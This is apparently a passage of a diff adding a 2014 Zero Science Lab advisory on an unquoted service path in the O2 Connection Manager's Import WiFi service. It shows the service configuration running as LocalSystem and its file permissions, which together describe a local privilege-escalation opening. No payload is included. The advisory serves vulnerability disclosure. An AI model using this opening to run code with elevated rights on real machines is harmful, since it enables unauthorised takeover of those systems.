C:\Program Files (x86)\O2CM-CE\O2 Connection Manager>
==========================================================================

65
platforms/windows/local/34967.txt Executable file
View file

@ -0,0 +1,65 @@
?
Telefonica O2 Connection Manager 8.7 Service Trusted Path Privilege Escalation
Vendor: Telefonica S.A.
Product web page: http://www.telefonica.com | http://www.o2.co.uk
Affected version: 8.7.6.792
Summary: O2 Connection Manager will help you to manage your internet
connections by getting you connected to the fastest available network.
Automatically connect you to the fastest available network including
your home broadband if you have a wireless router.
Desc: The O2 Connection Manager's service suffers from an unquoted
search path issue impacting the Import WiFi 'TGCM_ImportWiFiSvc'
service for Windows. This could potentially allow an authorized but
non-privileged local user to execute arbitrary code with elevated
privileges on the system. A successful attempt would require the
local user to be able to insert their code in the system root path
undetected by the OS or other security applications where it could
potentially be executed during application startup or reboot. If
successful, the local users code would execute with the elevated
privileges of the application.
Tested on: Microsoft Windows 7 Professional SP1 (EN)
Microsoft Windows 7 Ultimate SP1 (EN)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2014-5200
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5200.php
22.09.2014
---
C:\>sc qc TGCM_ImportWiFiSvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: TGCM_ImportWiFiSvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\O2\Connection Manager\ImpWiFiSvc.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : TGCM_ImportWiFiSvc
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\>icacls "C:\Program Files (x86)\O2\Connection Manager\ImpWiFiSvc.exe"
C:\Program Files (x86)\O2\Connection Manager\ImpWiFiSvc.exe NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
Successfully processed 1 files; Failed processing 0 files
C:\>
---